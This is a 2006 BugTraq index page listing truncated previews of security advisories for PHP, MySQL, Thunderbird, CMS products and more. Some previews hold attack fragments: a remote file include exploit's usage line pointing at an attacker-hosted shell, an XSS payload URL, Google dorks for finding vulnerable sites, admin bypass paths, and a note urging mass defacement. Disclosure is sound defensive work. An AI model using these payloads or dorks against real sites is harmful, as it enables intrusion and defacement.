BugTraq Mode:
VSR Advisory: WebSense content filter bypass when deployed in conjunction with Cisco filtering devices 2006-05-08
VSR Advisories (advisories vsecurity com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory

-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-

Advisory Name: WebSense content filter b

[ GLSA 200605-09 ] Mozilla Thunderbird: Multiple vulnerabilities 2006-05-08
Thierry Carrez (koon gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ GLSA 200605-08 ] PHP: Multiple vulnerabilities 2006-05-08
Thierry Carrez (koon gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

Secunia Research: Anti-Trojan unacev2.dll Buffer Overflow Vulnerability 2006-05-08
Secunia Research (remove-vuln secunia com)
======================================================================

Secunia Research 08/05/2006

- Anti-Trojan unacev2.dll Buffer Overflow Vulnerability -

======================================================================
Table of Contents

Affected Software.....

Secunia Research: TZipBuilder ZIP File Handling Buffer Overflow Vulnerability 2006-05-08
Secunia Research (remove-vuln secunia com)
======================================================================

Secunia Research 08/05/2006

- TZipBuilder ZIP File Handling Buffer Overflow Vulnerability -

======================================================================
Table of Contents

Affected Software..

[USN-283-1] MySQL vulnerabilities 2006-05-08
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-283-1 May 08, 2006
mysql-dfsg-4.1, mysql-dfsg vulnerabilities
CVE-2006-1516, CVE-2006-1517
===========================================================

A security issue affects the following Ubuntu releases

[USN-282-1] Nagios vulnerability 2006-05-08
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-282-1 May 08, 2006
nagios vulnerability
CVE-2006-2162
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04 (Hoary Hedgehog)
Ubunt

Re: Invision Community Blog .. Bugs 2006-05-08
mattmecham gmail com
This was fixed in the recent security update (IPB.Blog 1.2.3) after an internal audit.

http://forums.invisionpower.com/index.php?showtopic=214248&view=getnewpost

[Kurdish Security # 5] phpRaid Remote File Include [SMF] 2006-05-08
botan linuxmail org
# Kurdish Security Advisory

# phpRaid Remote File Include [SMF] :}

# "Insisting on socialism is insisting on being human" Abdullah Ocalan

# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan (at) linuxmail (dot) org

# Risk : High

# Class : Remote

# Script : phpRaid

# Script

[Kurdish Security # 4] phpRaid Remote File Include Vulnerability (PHPBB) 2006-05-08
botan linuxmail org
# Kurdish Security Advisory

# phpRaid Remote File Include [PHPBB] :}

# "Insisting on socialism is insisting on being human" Abdullah Ocalan

# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan (at) linuxmail (dot) org

# Script : phpRaid

# Script Website : http://www.spiffyj

INFIGO-2006-05-03: Multiple FTP Servers vulnerabilities 2006-05-08
infocus (infocus infigo hr)

INFIGO IS Security Advisory #ADV-2006-05-03
http://www.infigo.hr/

Title: Multiple FTP Servers vulnerabilities
Advisory ID: INFIGO-2006-05-03
Date: 2006-05-05
Advisory URL: http://www.infigo.hr/hr/in_focus/advisories/INFIGO-2006-05-03
Impact: Remote code exec

singapore v0.9.7 XSS Vulnerabilities 2006-05-08
alp_eren ayyildiz org
SOFTWARE:

=========

singapore v0.9.7

DESCRIPTION:

============

The system is vulnerable to various XSS attacks

google dork : "Powered by singapore v0.9.7" inurl:index.php?gallery

429 results :)

xss code example

================

www.site.com/images/index.php?gallery=[gallery name

Claroline Open Source e-Learning 1.7.5 Remote File Include 2006-05-08
beford (xbefordx gmail com)
#############
# Description
#############
# Vendor: http://www.claroline.net
# The file claroline/auth/extauth/drivers/ldap.inc.php uses the variable
# clarolineRepositorySys in a include() function without being declared.
# There are other files vulnerable in the same folder, this exploit only
# at

Multiple Vulnerabilities In IdealBB ASP Bulletin Board 2006-05-08
CodeScan Labs (advisories codescan com)
========================================================================

= CodeScan Advisory, codescan.com <advisories (at) codescan (dot) com>
=
= Multiple Vulnerabilities In IdealBB ASP Bulletin Board
=
= Vendor Website:
= http://www.idealscience.com
=
= Affected Version:
= Version 1.5.4a And Earlier
=

Dokeos Learning Management System 1.6.4 Remote File Include 2006-05-08
beford (xbefordx gmail com)
#!/usr/bin/perl

############

# Dokeos Learning Management System 1.6.4 Remote File Include
# Exploit & Advisorie: beford <xbefordx gmail com>

#
# usage:# perl own.pl <host> <cmd-shell-url> <cmd-var>

# perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd
#

# cmd shell example: <?

CAID 34013 - CA Common Services CAIRIM on z/OS LMP SVC vulnerability 2006-05-08
Williams, James K (James Williams ca com)

Title: CAID 34013 - CA Common Services CAIRIM on z/OS LMP SVC vulnerability

CA Vulnerability ID: 34013

CA Advisory Date: 2006-05-02

Discovered By: IBM Global Services

Impact: Local attacker can gain escalated privileges.

Summary:
A potential vulnerability issue exists in our CAIRIM LMP
so

[SECURITY] [DSA 1052-1] New cgiirc packages fix arbitrary code execution 2006-05-08
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1052-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
May 8th, 2006

Re: BankTown's ActiveX Buffer Overflow Vulnerability 2006-05-08
lkh1348 banktown com
The security module (BankTown Client Control 1,4,2,51817) mentioned above currently is not being used anymore.

For those who did not remove and still have it remained in their PCs, a new security patch has been released so that it is no longer vulnerable to those kinds of attacks.

AngelineCMS Multiple Vulnerabilities 2006-05-07
admin subjectzero net
Summary:

---------------------------------------------------

AngelineCMS API (C) 2003-2004 AngelineCMS developers (angelinecms (at) pythonzero (dot) org)

AngelineCMS API is a PHP framework which was developed for rapid development of AngelineCMS content management system.

AngelineCMS API is OPEN SOUR

[ GLSA 200605-07 ] Nagios: Buffer overflow 2006-05-07
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[KAPDA] MyBB1.1.1~Email Verification in User Activation ~SQL Injection Attack 2006-05-07
addmimistrator gmail com
ORIGINAL ADVISORY:

http://myimei.com/security/2006-05-07/mybb111email-verification-in-user-activation-sql-injection-attack.html

-Summary-

Software: MyBB

Software's Web Site: http://www.mybboard.com

Versions: 1.1.1

Class: Remote

Status: Unpatched

Exploit: Available

Solution: A

OpenEngine (PHP CMS) 2006-05-07
ck caroli info
OpenEngine is a PHP based CMS.

The parameter "template" is not correctly checked, for this you can include other scripts which will be interpreted.

All actual versions are vulnerable (up to 1.8 Beta 2, which is the newest one), only the paths and consequences differ.

For example you can bro

Phil's Bookmark script admin By-pass 2006-05-07
alp_eren ayyildiz org
google dork : "Phil's Bookmark"

and last path add to "admin.php?edit=[item id]"

example: www.site.com/bookmarks/admin.php?edit=1

www.ayyildiz.org

Limbo CMS (option=weblinks) SQL injection exploit 2006-05-07
SnoBMSN Hotmail De
<pre>

[i] Limbo CMS (option=weblinks) sql injection exploit

[i] Cyber-Security.ORG | Security Advisory | Security Edithor by SnoB | Turkish hacking | security{!}

<?php

if( (!isset($_GET['host'])) || (!isset($_GET['path'])) || (!isset($_GET['id'])))

{

?>

[*] Usage: <?echo htmlentities($PHP_

X-POLL admin By-Pass 2006-05-07
alp_eren ayyildiz org
google dork: inurl:x-poll

and add to /admin/images/add.php , upload to shell, and mass deface is server

www.ayyildiz.org

Re: ISA Server 2004 Log Manipulation 2006-05-06
Shaun Colley (shaun ngssoftware com)
Hey,

>I'm curious about why you regard this as security-relevant. I do not
>know what you mean by "log manipulation".

One possible attack vector would be to inject terminal emulator escape
sequences into the log file to leverage attacks against vulnerable
terminal emulator software. Let's say

URL Bug On 1ASPHost and DomainDLX Hosting Services 2006-05-05
spymeta yahoo com
This is a URL Bug on 1ASPHost & DomainDLX Hosting Services Internet Sites:

We Can Run Script, META Tag Or HTML Code.

JScript

Example (1ASP Host) :

http://www.1asphost.com/MainLogin.aspx?error=<script>alert('HACKED%20!')</script>

Example (DomainDLX)

http://www.domaindlx.com/MainL

phpBB 2.0.20 Full Path Disclosure and SQL Errors 2006-05-05
cxib securityreason com
-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1

[phpBB 2.0.20 Full Path Disclosure and SQL Errors]

Author: Maksymilian Arciemowicz (cXIb8O3)

Date:

- -Written: 1.5.2006

- -Public: 5.5.2006

from SecurityReason.Com

CVE:

- - CVE-2006-2219 Full Path Disclosure

- - CVE-2006-2220 Sql Errors

Copyright 2010, SecurityFocus